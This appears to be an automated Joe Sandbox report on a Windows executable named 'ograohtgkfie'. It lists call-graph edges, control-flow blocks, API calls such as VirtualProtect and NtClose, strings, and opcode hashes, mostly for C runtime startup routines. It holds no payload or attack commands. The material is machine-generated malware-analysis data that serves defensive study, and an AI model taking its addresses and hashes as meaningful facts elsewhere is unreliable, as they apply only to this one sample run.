3798->3800 3799->3798 3801 7ff621a91521 3800->3801 3802 7ff621a91394 2 API calls 3801->3802 3803 7ff621a9152b 3802->3803 3804 7ff621a91530 3803->3804 3805 7ff621a91394 2 API calls 3803->3805 3806 7ff621a91394 2 API calls 3804->3806 3805->3804 3807 7ff621a9153a 3806->3807 3808 7ff621a91394 2 API calls 3807->3808 3809 7ff621a9153f 3808->3809 3810 7ff621a91394 2 API calls 3809->3810 3811 7ff621a9154e 3810->3811 3812 7ff621a91394 2 API calls 3811->3812 3813 7ff621a9155d 3812->3813 3814 7ff621a91394 2 API calls 3813->3814 3815 7ff621a9156c 3814->3815 3816 7ff621a91394 2 API calls 3815->3816 3817 7ff621a9157b 3816->3817 3818 7ff621a91394 2 API calls 3817->3818 3819 7ff621a9158a 3818->3819 3820 7ff621a91394 2 API calls 3819->3820 3821 7ff621a91599 3820->3821 3822 7ff621a91394 2 API calls 3821->3822 3823 7ff621a915a8 3822->3823 3824 7ff621a91394 2 API calls 3823->3824 3825 7ff621a915b7 3824->3825 3826 7ff621a915c6 3825->3826 3827 7ff621a91394 2 API calls 3825->3827 3828 7ff621a91394 2 API calls 3826->3828 3827->3826 3829 7ff621a915d0 3828->3829 3830 7ff621a915d5 3829->3830 3831 7ff621a91394 2 API calls 3829->3831 3832 7ff621a91394 2 API calls 3830->3832 3831->3830 3833 7ff621a915e4 3832->3833 3834 7ff621a91394 2 API calls 3833->3834 3835 7ff621a915f3 3834->3835 3835->3215 3837 7ff621a91394 2 API calls 3836->3837 3838 7ff621a915d0 3837->3838 3839 7ff621a915d5 3838->3839 3840 7ff621a91394 2 API calls 3838->3840 3841 7ff621a91394 2 API calls 3839->3841 3840->3839 3842 7ff621a915e4 3841->3842 3843 7ff621a91394 2 API calls 3842->3843 3844 7ff621a915f3 3843->3844 3844->3196 3915 7ff621a92320 strlen 3916 7ff621a92337 3915->3916 3926 7ff621a91000 3927 7ff621a9108b __set_app_type 3926->3927 3928 7ff621a91040 3926->3928 3930 7ff621a910b6 3927->3930 3928->3927 3929 7ff621a910e5 3930->3929 3932 7ff621a91e00 3930->3932 3933 7ff621a97410 __setusermatherr 3932->3933 3934 7ff621a91800 3935 7ff621a91812 3934->3935 3936 7ff621a91835 fprintf 3935->3936 3893 7ff621a91ac3 3894 7ff621a91ade 3893->3894 3895 7ff621a9199e 3894->3895 3896 7ff621a91b36 3894->3896 3898 7ff621a91a0f 3894->3898 3895->3898 3899 7ff621a919e9 VirtualProtect 3895->3899 3897 7ff621a91ba0 4 API calls 3896->3897 3900 7ff621a91b53 3897->3900 3899->3895 3900->3900 3937 7ff621a91404 3938 7ff621a91394 2 API calls 3937->3938 3939 7ff621a91413 3938->3939 3940 7ff621a91422 3939->3940 3941 7ff621a91394 2 API calls 3939->3941 3942 7ff621a91394 2 API calls 3940->3942 3941->3940 3943 7ff621a9142c 3942->3943 3944 7ff621a91431 3943->3944 3945 7ff621a91394 2 API calls 3943->3945 3946 7ff621a91394 2 API calls 3944->3946 3945->3944 3947 7ff621a9143b 3946->3947 3948 7ff621a91394 2 API calls 3947->3948 3949 7ff621a91440 3948->3949 3950 7ff621a91394 2 API calls 3949->3950 3951 7ff621a9144f 3950->3951 3952 7ff621a91394 2 API calls 3951->3952 3953 7ff621a9145e 3952->3953 3954 7ff621a91394 2 API calls 3953->3954 3955 7ff621a9146d 3954->3955 3956 7ff621a91394 2 API calls 3955->3956 3957 7ff621a9147c 3956->3957 3958 7ff621a91394 2 API calls 3957->3958 3959 7ff621a9148b 3958->3959 3960 7ff621a91394 2 API calls 3959->3960 3961 7ff621a9149a 3960->3961 3962 7ff621a91394 2 API calls 3961->3962 3963 7ff621a914a9 3962->3963 3964 7ff621a914b8 3963->3964 3965 7ff621a91394 2 API calls 3963->3965 3966 7ff621a91394 2 API calls 3964->3966 3965->3964 3967 7ff621a914c2 3966->3967 3968 7ff621a914c7 3967->3968 3969 7ff621a91394 2 API calls 3967->3969 3970 7ff621a91394 2 API calls 3968->3970 3969->3968 3971 7ff621a914d6 3970->3971 3972 7ff621a91394 2 API calls 3971->3972 3973 7ff621a914e0 3972->3973 3974 7ff621a914e5 3973->3974 3975 7ff621a91394 2 API calls 3973->3975 3976 7ff621a91394 2 API calls 3974->3976 3975->3974 3977 7ff621a914ef 3976->3977 3978 7ff621a914f4 3977->3978 3979 7ff621a91394 2 API calls 3977->3979 3980 7ff621a91394 2 API calls 3978->3980 3979->3978 3981 7ff621a914fe 3980->3981 3982 7ff621a91503 3981->3982 3983 7ff621a91394 2 API calls 3981->3983 3984 7ff621a91394 2 API calls 3982->3984 3983->3982 3985 7ff621a9150d 3984->3985 3986 7ff621a91512 3985->3986 3987 7ff621a91394 2 API calls 3985->3987 3988 7ff621a91394 2 API calls 3986->3988 3987->3986 3989 7ff621a91521 3988->3989 3990 7ff621a91394 2 API calls 3989->3990 3991 7ff621a9152b 3990->3991 3992 7ff621a91530 3991->3992 3993 7ff621a91394 2 API calls 3991->3993 3994 7ff621a91394 2 API calls 3992->3994 3993->3992 3995 7ff621a9153a 3994->3995 3996 7ff621a91394 2 API calls 3995->3996 3997 7ff621a9153f 3996->3997 3998 7ff621a91394 2 API calls 3997->3998 3999 7ff621a9154e 3998->3999 4000 7ff621a91394 2 API calls 3999->4000 4001 7ff621a9155d 4000->4001 4002 7ff621a91394 2 API calls 4001->4002 4003 7ff621a9156c 4002->4003 4004 7ff621a91394 2 API calls 4003->4004 4005 7ff621a9157b 4004->4005 4006 7ff621a91394 2 API calls 4005->4006 4007 7ff621a9158a 4006->4007 4008 7ff621a91394 2 API calls 4007->4008 4009 7ff621a91599 4008->4009 4010 7ff621a91394 2 API calls 4009->4010 4011 7ff621a915a8 4010->4011 4012 7ff621a91394 2 API calls 4011->4012 4013 7ff621a915b7 4012->4013 4014 7ff621a915c6 4013->4014 4015 7ff621a91394 2 API calls 4013->4015 4016 7ff621a91394 2 API calls 4014->4016 4015->4014 4017 7ff621a915d0 4016->4017 4018 7ff621a915d5 4017->4018 4019 7ff621a91394 2 API calls 4017->4019 4020 7ff621a91394 2 API calls 4018->4020 4019->4018 4021 7ff621a915e4 4020->4021 4022 7ff621a91394 2 API calls 4021->4022 4023 7ff621a915f3 4022->4023 4024 7ff621a92104 4025 7ff621a92111 EnterCriticalSection 4024->4025 4027 7ff621a92218 4024->4027 4028 7ff621a9220b LeaveCriticalSection 4025->4028 4032 7ff621a9212e 4025->4032 4026 7ff621a92272 4027->4026 4029 7ff621a92241 DeleteCriticalSection 4027->4029 4031 7ff621a92230 free 4027->4031 4028->4027 4029->4026 4030 7ff621a9214d TlsGetValue GetLastError 4030->4032 4031->4029 4031->4031 4032->4028 4032->4030 3865 7ff621a91e65 3866 7ff621a91e67 signal 3865->3866 3867 7ff621a91e7c 3866->3867 3869 7ff621a91e99 3866->3869 3868 7ff621a91e82 signal 3867->3868 3867->3869 3868->3869

                                                                  Callgraph

                                                                  • Executed
                                                                  • Not Executed
                                                                  • Opacity -> Relevance
                                                                  • Disassembly available
                                                                  callgraph 0 Function_00007FF621A910F0 1 Function_00007FF621A92DF0 45 Function_00007FF621A91512 1->45 66 Function_00007FF621A9145E 1->66 70 Function_00007FF621A92660 1->70 107 Function_00007FF621A92690 1->107 2 Function_00007FF621A963F0 3 Function_00007FF621A96AF1 4 Function_00007FF621A914F4 113 Function_00007FF621A91394 4->113 5 Function_00007FF621A917E0 6 Function_00007FF621A920E0 5->6 7 Function_00007FF621A931E0 59 Function_00007FF621A91370 7->59 8 Function_00007FF621A922E0 9 Function_00007FF621A92DE0 10 Function_00007FF621A937E0 11 Function_00007FF621A91AE4 87 Function_00007FF621A91D40 11->87 101 Function_00007FF621A91BA0 11->101 12 Function_00007FF621A914E5 12->113 13 Function_00007FF621A91FD0 14 Function_00007FF621A917D0 15 Function_00007FF621A924D0 16 Function_00007FF621A966D1 17 Function_00007FF621A963D1 18 Function_00007FF621A91AD4 18->87 18->101 19 Function_00007FF621A915D5 19->113 20 Function_00007FF621A915C6 20->113 21 Function_00007FF621A914C7 21->113 22 Function_00007FF621A916C0 23 Function_00007FF621A91FC0 24 Function_00007FF621A965C0 25 Function_00007FF621A938C0 25->19 25->20 28 Function_00007FF621A914B8 25->28 25->66 99 Function_00007FF621A914A9 25->99 105 Function_00007FF621A9149A 25->105 25->107 115 Function_00007FF621A9148B 25->115 122 Function_00007FF621A9147C 25->122 26 Function_00007FF621A92DC0 27 Function_00007FF621A91AC3 27->87 27->101 28->113 29 Function_00007FF621A93B30 29->1 29->2 29->21 29->22 29->24 29->25 30 Function_00007FF621A91530 29->30 52 Function_00007FF621A91503 29->52 57 Function_00007FF621A96C70 29->57 29->59 60 Function_00007FF621A96E70 29->60 61 Function_00007FF621A92F70 29->61 64 Function_00007FF621A9156C 29->64 65 Function_00007FF621A9146D 29->65 29->66 29->70 78 Function_00007FF621A93350 29->78 84 Function_00007FF621A9153F 29->84 85 Function_00007FF621A91440 29->85 88 Function_00007FF621A96B40 29->88 91 Function_00007FF621A969B0 29->91 98 Function_00007FF621A915A8 29->98 29->99 106 Function_00007FF621A96790 29->106 118 Function_00007FF621A96880 29->118 121 Function_00007FF621A9157B 29->121 30->113 31 Function_00007FF621A97130 31->60 32 Function_00007FF621A96E31 33 Function_00007FF621A96C31 34 Function_00007FF621A96731 35 Function_00007FF621A93331 36 Function_00007FF621A91431 36->113 37 Function_00007FF621A92420 38 Function_00007FF621A92320 39 Function_00007FF621A96B20 40 Function_00007FF621A93821 41 Function_00007FF621A91422 41->113 42 Function_00007FF621A91E10 43 Function_00007FF621A96711 44 Function_00007FF621A96C11 45->113 46 Function_00007FF621A91E00 47 Function_00007FF621A91000 47->23 47->46 77 Function_00007FF621A91750 47->77 92 Function_00007FF621A91FB0 47->92 48 Function_00007FF621A91800 109 Function_00007FF621A92290 48->109 49 Function_00007FF621A92500 50 Function_00007FF621A93800 51 Function_00007FF621A96E01 52->113 53 Function_00007FF621A91404 53->113 54 Function_00007FF621A92104 55 Function_00007FF621A9216F 56 Function_00007FF621A91A70 56->87 58 Function_00007FF621A91870 61->7 61->99 62 Function_00007FF621A96571 63 Function_00007FF621A96971 64->113 65->113 66->113 67 Function_00007FF621A91160 67->22 67->29 67->58 67->67 108 Function_00007FF621A91F90 67->108 116 Function_00007FF621A91880 67->116 68 Function_00007FF621A91760 68->6 69 Function_00007FF621A92460 71 Function_00007FF621A93861 72 Function_00007FF621A96361 73 Function_00007FF621A96861 74 Function_00007FF621A91E65 74->58 75 Function_00007FF621A9155D 75->113 76 Function_00007FF621A91650 78->36 78->41 78->59 78->66 79 Function_00007FF621A92050 80 Function_00007FF621A96E50 81 Function_00007FF621A96551 82 Function_00007FF621A96C51 83 Function_00007FF621A91F47 83->58 84->113 85->113 86 Function_00007FF621A91140 86->67 87->109 89 Function_00007FF621A96341 90 Function_00007FF621A923B0 93 Function_00007FF621A922B0 94 Function_00007FF621A963B1 95 Function_00007FF621A965B1 96 Function_00007FF621A966B1 97 Function_00007FF621A91AB3 97->87 97->101 98->113 99->113 100 Function_00007FF621A9219E 101->15 101->87 101->90 102 Function_00007FF621A91FA0 103 Function_00007FF621A938A0 104 Function_00007FF621A92DA1 105->113 107->4 107->12 107->21 107->52 107->59 107->60 107->66 107->75 107->99 110 Function_00007FF621A92590 111 Function_00007FF621A96990 112 Function_00007FF621A96591 113->31 117 Function_00007FF621A96E80 113->117 114 Function_00007FF621A92194 114->58 115->113 116->37 116->70 116->87 116->101 117->60 119 Function_00007FF621A93880 120 Function_00007FF621A96381 121->113 122->113

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                                  • String ID:
                                                                  • API String ID: 2643109117-0
                                                                  • Opcode ID: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
                                                                  • Instruction ID: 28a6bcc9676907d69995c1ed5a90bdfbdcd1e82f11097393ae9edf83c3e741fa
                                                                  • Opcode Fuzzy Hash: 73d309c2beea73d93cb65a6f5d0f2b5c2ae28225b33121ea806aae5ad6748919
                                                                  • Instruction Fuzzy Hash: 64515575A0D64681FF10AB65EDA137A23A0BF487A0F44C937CA0DC73A5DE3EA481C302

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF621A91156), ref: 00007FF621A913F7
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
                                                                  • Instruction ID: c5f1cfcbaf786c590e1d614cad71447ebf7fab743f9574c1d1540faea3791522
                                                                  • Opcode Fuzzy Hash: df53f7b1e899476c23fb165e9ece8f0bc6a2fcfd61ce6596995948ec7f7a5c88
                                                                  • Instruction Fuzzy Hash: 46F06671A0CB5186DB10DB51FC6156A77A1FB48790B009837E98EC6725DF3EE190CB41

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: memset$wcscatwcscpywcslen
                                                                  • String ID: $0$0$@$@
                                                                  • API String ID: 4263182637-1413854666
                                                                  • Opcode ID: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
                                                                  • Instruction ID: dca1d4f49ab34edb4401104eb83d2e5ebfbab9cc505d34477407219b6e2c2206
                                                                  • Opcode Fuzzy Hash: 490bacf3545b7b8fc80e0b10f2766644d95de23be91c7042de06992202d40e5b
                                                                  • Instruction Fuzzy Hash: 97B1902191C6C295FB218B24E8153BB77B0FF84348F008636EA89C76A5DF7DD185CB42

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                                  • String ID: 0$X$`
                                                                  • API String ID: 329590056-2527496196
                                                                  • Opcode ID: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
                                                                  • Instruction ID: 42cb88f1c0638595b137f0d0ea7ee2db0cd93d618b349c0a91952a6bef95ef1b
                                                                  • Opcode Fuzzy Hash: 8dde73c9b64010c461290e6d9581102e111f0495f16f93885a92462792e7b513
                                                                  • Instruction Fuzzy Hash: 58026C22A1CBC191EB218B25E8543AA77A4FB857A4F008336DA9CC77E5DF7DD189C701

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91C63
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91CC7
                                                                  • memcpy.MSVCRT ref: 00007FF621A91CE0
                                                                  • GetLastError.KERNEL32(?,?,?,?,00007FF621A991C0,00007FF621A991C0,?,?,00007FF621A90000,?,00007FF621A91991), ref: 00007FF621A91D23
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                                  • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                                  • API String ID: 2595394609-2123141913
                                                                  • Opcode ID: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
                                                                  • Instruction ID: c3a22a557f1f59cd1b7d8a817965697ad6706a32a3285686511e8a1bb9982c9c
                                                                  • Opcode Fuzzy Hash: 9d1e4b83a29c56fd3109a824e6e1f3e6aa46fb5945b56ac49a4cb997ac10c929
                                                                  • Instruction Fuzzy Hash: 5F418E61A0CA5691EF219B55DC646B927A0EB84BE0F148533CE0EC37A1DE3EE585C302

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                  • String ID:
                                                                  • API String ID: 3326252324-0
                                                                  • Opcode ID: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
                                                                  • Instruction ID: c8490465ba9a69d87d8b56babcdea9c00b800bae2e47c14d1a85c6373f53440b
                                                                  • Opcode Fuzzy Hash: 38e3c1362194875042f0d287631ebe0d18285824619c025f5ce5c131483a81ea
                                                                  • Instruction Fuzzy Hash: 1821C324A0DA12C1FF1A9B65ED642742260BF40B90F548A73C91EC77A4DF7EA886C302

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 549 7ff621a91e10-7ff621a91e2d 550 7ff621a91e3e-7ff621a91e48 549->550 551 7ff621a91e2f-7ff621a91e38 549->551 553 7ff621a91ea3-7ff621a91ea8 550->553 554 7ff621a91e4a-7ff621a91e53 550->554 551->550 552 7ff621a91f60-7ff621a91f69 551->552 553->552 555 7ff621a91eae-7ff621a91eb3 553->555 556 7ff621a91e55-7ff621a91e60 554->556 557 7ff621a91ecc-7ff621a91ed1 554->557 558 7ff621a91eb5-7ff621a91eba 555->558 559 7ff621a91efb-7ff621a91f0a call 7ff621a97420 555->559 556->553 560 7ff621a91f23-7ff621a91f2d 557->560 561 7ff621a91ed3-7ff621a91ee2 signal 557->561 558->552 562 7ff621a91ec0 558->562 559->560 571 7ff621a91f0c-7ff621a91f10 559->571 565 7ff621a91f2f-7ff621a91f3f 560->565 566 7ff621a91f43-7ff621a91f45 560->566 561->560 563 7ff621a91ee4-7ff621a91ee8 561->563 562->560 567 7ff621a91f4e-7ff621a91f53 563->567 568 7ff621a91eea-7ff621a91ef9 signal 563->568 565->566 566->552 570 7ff621a91f5a 567->570 568->552 570->552 572 7ff621a91f12-7ff621a91f21 signal 571->572 573 7ff621a91f55 571->573 572->552 573->570
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CCG
                                                                  • API String ID: 0-1584390748
                                                                  • Opcode ID: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
                                                                  • Instruction ID: d13f84ec6cc89b7c77bfd66bb20b702cf9349b907048335532d296da20d8cedb
                                                                  • Opcode Fuzzy Hash: 636ac494cce984edb064c3aed41a9ca65764b02bd37c4c677f53efd8ed5c70d9
                                                                  • Instruction Fuzzy Hash: 83217A26F0C10E41FF6542599EA037911819F987B8F25CA37DA1DC33D9DF2EACC28242

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF621A91247), ref: 00007FF621A919F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: ProtectVirtual
                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                  • API String ID: 544645111-395989641
                                                                  • Opcode ID: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
                                                                  • Instruction ID: 2747fcf72da5a3007014866d3dcc459bc0c656711eefb6b7a897c072e60ab5ec
                                                                  • Opcode Fuzzy Hash: 8b8743c3c25ddeb697c2250a699c764c5677b113e9dc3baa29e2240e638690c3
                                                                  • Instruction Fuzzy Hash: A3517D66F0C556D6EF108B25DC607B927A1EB04BA4F048232D91DC7BA5DE3EE9C6C702

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 608 7ff621a91800-7ff621a91810 609 7ff621a91812-7ff621a91822 608->609 610 7ff621a91824 608->610 611 7ff621a9182b-7ff621a91867 call 7ff621a92290 fprintf 609->611 610->611
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: fprintf
                                                                  • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                  • API String ID: 383729395-3474627141
                                                                  • Opcode ID: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
                                                                  • Instruction ID: 1868860db12813f265af91eb06f015286744dfac76d27b3d881872278e02bb5d
                                                                  • Opcode Fuzzy Hash: 6a04be2a5377543e6f5360f4a477f3baed8082d80598df8c86f2ffb9abe0366d
                                                                  • Instruction Fuzzy Hash: AEF0C212E1DA8982EB119B24AD510B96360EB597D1F50D632DE4DD7255DF2DE1C2C301

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.2019184113.00007FF621A91000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF621A90000, based on PE: true
                                                                  • Associated: 00000009.00000002.2019172780.00007FF621A90000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019196551.00007FF621A98000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019208788.00007FF621A9A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019390089.00007FF621D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000009.00000002.2019406030.00007FF621D16000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_7ff621a90000_ograohtgkfie.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                  • String ID:
                                                                  • API String ID: 682475483-0
                                                                  • Opcode ID: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
                                                                  • Instruction ID: d8cf763de8ab6202658091313157ad5a2acb153097e0f5152476496748f0eb87
                                                                  • Opcode Fuzzy Hash: ca46d75936f49b974659a263795f574fa980eb51f7fd19c67d5382fb06102bed
